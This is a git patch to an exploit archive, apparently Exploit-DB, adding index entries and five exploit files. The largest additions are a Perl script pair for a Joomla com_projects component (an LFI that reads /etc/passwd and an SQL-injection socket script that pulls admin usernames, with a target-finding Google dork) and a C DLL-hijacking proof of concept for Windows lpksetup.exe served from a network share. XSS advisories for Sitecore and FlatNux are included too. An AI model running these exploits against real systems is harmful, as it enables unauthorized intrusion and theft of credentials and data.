From 174997aa11f064904f22d2bd054fa0f332754b10 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 12 Oct 2014 04:43:47 +0000 Subject: [PATCH] Updated 10_12_2014 --- files.csv | 7 +- platforms/linux/remote/34932.html | 9 ++ platforms/php/webapps/34930.txt | 9 ++ platforms/php/webapps/34933.txt | 12 +++ platforms/php/webapps/34934.pl | 139 ++++++++++++++++++++++++++++++ platforms/windows/remote/34931.c | 57 ++++++++++++ 6 files changed, 232 insertions(+), 1 deletion(-) create mode 100755 platforms/linux/remote/34932.html create mode 100755 platforms/php/webapps/34930.txt create mode 100755 platforms/php/webapps/34933.txt create mode 100755 platforms/php/webapps/34934.pl create mode 100755 platforms/windows/remote/34931.c diff --git a/files.csv b/files.csv index baa3175b1..216b9b475 100755 --- a/files.csv +++ b/files.csv @@ -31444,10 +31444,15 @@ id,file,description,date,author,platform,type,port 34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 -34923,platforms/linux/local/34923.c,"Linux Kernel remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0 +34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0 34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0 34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin Upload Vulnerability",2014-10-09,metasploit,php,remote,80 34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer Remote Command Execution",2014-10-09,metasploit,windows,remote,80 34927,platforms/unix/remote/34927.rb,"F5 iControl Remote Root Command Execution",2014-10-09,metasploit,unix,remote,443 34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0 34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Stored XSS",2014-10-09,"Frank Lycops",multiple,webapps,0 +34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 'default.aspx' Cross Site Scripting Vulnerability",2009-06-03,intern0t,php,webapps,0 +34931,platforms/windows/remote/34931.c,"Microsoft Windows VISTA 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-25,"Tyler Borland",windows,remote,0 +34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution Vulnerability",2010-10-26,s_n,linux,remote,0 +34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 Multiple Cross Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0 +34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Include Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0 diff --git a/platforms/linux/remote/34932.html b/platforms/linux/remote/34932.html new file mode 100755 index 000000000..015e18310 --- /dev/null +++ b/platforms/linux/remote/34932.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44421/info + +NitroView ESM is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied input. + +Successful attacks may allow an attacker to execute arbitrary commands on the appliance in the context of the webserver process. + +NitroView ESM 8.4.0a is affected; other versions may also be vulnerable. + + 
 [*] Tested on v8.4.0a "NitroSecurity 2.6.22.19-24nssmp64 GNU/Linux" [*] No authentication required [*] "ESSPMDebug=1" in "/usr/local/ess/CPConsoleServer.cfg" required
\ No newline at end of file diff --git a/platforms/php/webapps/34930.txt b/platforms/php/webapps/34930.txt new file mode 100755 index 000000000..785a6be73 --- /dev/null +++ b/platforms/php/webapps/34930.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44405/info + +Sitecore CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Sitecore CMS 6.0.0 rev. 090120 is vulnerable; other versions may also be affected. + +http://www.example.com/sitecore/login/default.aspx?sc_error= \ No newline at end of file diff --git a/platforms/php/webapps/34933.txt b/platforms/php/webapps/34933.txt new file mode 100755 index 000000000..e34529b71 --- /dev/null +++ b/platforms/php/webapps/34933.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/44454/info + +FlatNux is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +FlatNux 2009-03-27 is vulnerable; other versions may also be affected. + +http://www.example.com/flatnux/index.php?mod="> +http://www.example.com/flatnux/index.php?mod=login&op=profile&user="> +http://www.example.com/flatnux/index.php?opindex=modcont&file=misc/motd.en.php&from="> +ttp://www.example.com/flatnux/controlcenter.php?mod=controlcenter&op=03_users/20_groups&opmod=insnew_groups&pk="> diff --git a/platforms/php/webapps/34934.pl b/platforms/php/webapps/34934.pl new file mode 100755 index 000000000..ee6eea045 --- /dev/null +++ b/platforms/php/webapps/34934.pl @@ -0,0 +1,139 @@ +source: http://www.securityfocus.com/bid/44456/info + +The 'com_projects' component for Joomla! is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. By using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks. + +========================================================= +Joomla Component com_projects LFI & SQL Vulnerability +========================================================= + +[+]Title : Joomla Component com_calendrier RFI Vulnerability +[+]Author : jos_ali_joe +[+]Contact : josalijoe@yahoo.com +[+]Home : http://josalijoe.wordpress.com/ +######################################################################## +Dork : inurl:index.php?option="com_projects" +######################################################################## +[ Software Information ] +######################################################################## +[+] Vendor : http://www.codegravity.com/ +[+] Download : http://www.joomla.org/download.html +[+] version : Joomla 1.5 +[+] Vulnerability : LFI and SQL Vulnerability +[+] Dork : com_projects +######################################################################## +[+] Exploit: LFI +==================================================================================== +http://localhost/index.php?option=com_projects&controller=[ LFI ] +==================================================================================== +use LWP::UserAgent; +use HTTP::Request; +use LWP::Simple; + +print "\t\t########################################################\n\n"; +print "\t\t# Joomla Component com_projects LFI Vulnerability #\n\n"; +print "\t\t# by jos_ali_joe #\n\n"; +print "\t\t########################################################\n\n"; + + +if (!$ARGV[0]) +{ +print "Usage: perl idc.pl [HOST]\n"; +print "Example: perl idc.pl http://localhost/LFI/\n";; +} + +else +{ + +$web=$ARGV[0]; +chomp $web; + +$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00"; + +my $web1=$web.$iny; +print "$web1\n\n"; +my $ua = LWP::UserAgent->new; +my $req=HTTP::Request->new(GET=>$web1); +$doc = $ua->request($req)->as_string; + +if ($doc=~ /^root/moxis ){ +print "Web is vuln\n"; +} +else +{ +print "Web is not vuln\n"; +} + +} + +#################################################################################### +[+] Exploit: SQL +==================================================================================== +http://localhost/index.php?option=com_projects&view=project&id=[ SQL ] +==================================================================================== +use IO::Socket; +if(@ARGV < 1){ +print " +[======================================================================== +[// Joomla Component com_projects SQL Injection Exploit +[// Usage: idc.pl [target] +[// Example: idc.pl localhost.com +[// Vuln&Exp : jos_ali_joe +[======================================================================== +"; +exit(); +} +#Local variables +$server = $ARGV[0]; +$server =~ s/(http:\/\/)//eg; +$host = "http://".$server; +$port = "80"; +$file = "/index.php?option=com_projects&view=project&id="; + +print "Script : "; +$dir = ; +chop ($dir); + +if ($dir =~ /exit/){ +print "-- Exploit Failed[You Are Exited] \n"; +exit(); +} + +if ($dir =~ /\//){} +else { +print "-- Exploit Failed[No DIR] \n"; +exit(); + } + + +$target = "SQL Injection Exploit"; +$target = $host.$dir.$file.$target; + +#Writing data to socket +print "+**********************************************************************+\n"; +print "+ Trying to connect: $server\n"; +$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; +print $socket "GET $target HTTP/1.1\n"; +print $socket "Host: $server\n"; +print $socket "Accept: * /*\n"; +print $socket "Connection: close\n\n"; +print "+ Connected!...\n"; +#Getting +while($answer = <$socket>) { +if ($answer =~ /username:(.*?)pass/){ +print "+ Exploit succeed! Getting admin information.\n"; +print "+ ---------------- +\n"; +print "+ Username: $1\n"; +} + +#################################################################################### +Thanks : +./kaMtiEz ? ibl13Z ? Xrobot ? tukulesto ? R3m1ck ? jundab - asickboys- Vyc0d ? Yur4kha - XPanda - eL Farhatz +./ArRay ? akatsuchi ? K4pt3N ? Gameover ? antitos ? yuki ? pokeng ? ffadill - Alecs - v3n0m - RJ45 +./Kiddies ? pL4nkt0n ? chaer newbie ? andriecom ? Abu_adam ? Petimati - hakz ? Virgi ? Anharku - a17z a.k.a maho +./Me Family ATeN4 : +./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe +Greets For : +./Devilzc0de crew ? Kebumen Cyber ? Explore Crew ? Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Jatim Crew - Malang Cyber +My Team : ./Indonesian Coder \ No newline at end of file diff --git a/platforms/windows/remote/34931.c b/platforms/windows/remote/34931.c new file mode 100755 index 000000000..b482443e9 --- /dev/null +++ b/platforms/windows/remote/34931.c @@ -0,0 +1,57 @@ +source: http://www.securityfocus.com/bid/44414/info + +Microsoft Windows 'lpksetup.exe' is prone to a vulnerability that lets attackers execute arbitrary code. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +/* +Exploit: Windows Vista/7 lpksetup.exe (oci.dll) DLL Hijacking +Vulnerability +Extension: .mlc +Author: Tyler Borland (tborland1@gmail.com) +Date: 10/20/2010 +Tested on: Windows 7 Ultimate (Windows Vista Ultimate/Enterpries and +Windows 7 Enterprise should be vulnerable as well) +Effect: Remote Code Execution + +lpksetup is the language pack installer that is included by default with +Windows Vista/7 Ultimate or Enterprise editions. By opening a .mlc file +through something like an open SMB or WebDav share, the oci.dll file will be +grabbed and ran in the context of the vulnerable application. + +This is a LoadLibrary() load path bug. The load library search order is: + 1. The directory from which the application loaded + 2. 32-bit System directory (Windows\System32) + 3. 16-bit System directory (Windows\System) + 4. Windows directory (Windows) + 5. Current working directory + 6. Directories in the PATH environment variable +As OracleOciLib is not used on target system, oci.dll does not exist, so if +a full path is not supplied when calling the dll or the search path has not +been cleared before the call, we will hit our fifth search path and load the +library from the remote filesystem. + +Interestingly enough, while lpksetup is blocked for execution by UAC under a +normal user, the injected library (payload) will still execute. +Exploiters make sure your system's security policy, secpol.msc, allows +complete anonymous share access for connecting users. +Outlook links seem to be the current exploit toyland, other vectors: +http://www.binaryplanting.com/attackVectors.htm +*/ + +#include + +int main() +{ + WinExec("calc", SW_NORMAL); // the typical non-lethal PoC + exit(0); + return 0; +} + +BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) +{ + main(); + return 0; +} + +/* ~/.wine/drive_c/MinGW/bin/wine gcc.exe lpksetup.c -o oci.dll */